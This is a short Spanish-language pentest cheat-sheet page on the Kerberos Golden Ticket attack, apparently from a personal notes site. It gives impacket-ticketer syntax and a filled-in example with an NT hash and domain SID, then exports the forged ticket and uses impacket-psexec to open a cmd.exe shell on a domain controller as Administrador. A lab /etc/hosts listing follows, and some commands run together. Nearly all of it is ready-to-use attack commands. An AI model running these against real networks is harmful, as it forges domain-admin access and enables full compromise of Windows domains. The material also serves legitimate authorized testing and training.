Golden Ticket Attack
Explotación
Con impacket-ticketer
# Usage
impacket-ticketer -nthash <nthash> -domain-sid <sid> -domain <domain.local> (user)
# Example
impacket-ticketer -nthash 7a10ed0c241a70ea53777ca37c320bd9 -domain-sid S-1-5-21-559191057-1952517652-1921332360 -domain gerarcorp.local Administradorexport KRB5CCNAME=Administrador.ccacheimpacket-psexec -k -no-pass gerarcorp.local/Administrador@DC-Company cmd.exe
## cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.0.111 gerarcorp gerarcorp.local DC-CompanyCon Mimikatz
Last updated